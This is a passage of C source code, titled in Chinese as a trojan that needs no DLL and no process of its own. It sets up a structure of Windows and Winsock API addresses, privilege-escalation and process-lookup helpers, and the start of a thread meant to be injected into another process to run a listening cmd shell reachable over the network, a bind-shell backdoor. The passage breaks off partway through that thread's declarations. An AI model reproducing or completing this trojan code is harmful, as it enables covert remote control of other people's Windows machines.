无dll无进程木马

#include<windows.h>
//#include<winsock2.h>
#include <Shlwapi.h>
#include <tlhelp32.h>

#pragma comment(lib,"Shlwapi.lib")

//参数结构 ;
typedef struct _RemotePara{
   DWORD dwLoadLibrary;
   DWORD dwFreeLibrary;
   DWORD dwGetProcAddress;
   DWORD dwGetModuleHandle;
   DWORD dwWSAStartup;
   DWORD dwSocket;
   DWORD dwhtons;
   DWORD dwbind;
   DWORD dwlisten;
   DWORD dwaccept;
   DWORD dwsend;
   DWORD dwrecv;
   DWORD dwclosesocket;
   DWORD dwCreateProcessA;
   DWORD dwPeekNamedPipe;
   DWORD dwWriteFile;
   DWORD dwReadFile;
   DWORD dwCloseHandle;
   DWORD dwCreatePipe;
   DWORD dwTerminateProcess;

   DWORD dwMessageBox;
   char strMessageBox[12];
   char winsockDll[16];
   char cmd[10];
   char Buff[4096];
   char telnetmsg[60];

}RemotePara;

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 提升应用级调试权限
DWORD GetPidByName(char *szName); // 根据进程名称得到进程ID

// 远程线程执行体
DWORD __stdcall ThreadProc(RemotePara *Para){
 WSADATA WSAData;
 SOCKET listenSocket, clientSocket;
 struct sockaddr_in server_addr, client_addr;
 int iAddrSize = sizeof(client_addr);
 SECURITY_ATTRIBUTES sa;
 HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;
 STARTUPINFO si;
 PROCESS_INFORMATION ProcessInformation;
 unsigned long lBytesRead = 0;

 typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
 typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
 typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
 typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

 FARPROC PMessageBoxA;
 FARPROC PWSAStartup;
 FARPROC PSocket;
 FARPROC Phtons;
 FARPROC Pbind;
 FARPROC Plisten;
 FARPROC Paccept;
 FARPROC Psend;
 FARPROC Precv;
 FARPROC Pclosesocket;
 FARPROC PCreateProcessA;
 FARPROC PPeekNamedPipe;
 FARPROC PWriteFile;
 FARPROC PReadFile;
 FARPROC PCloseHandle;
 FARPROC PCreatePipe;
 FARPROC PTerminateProcess;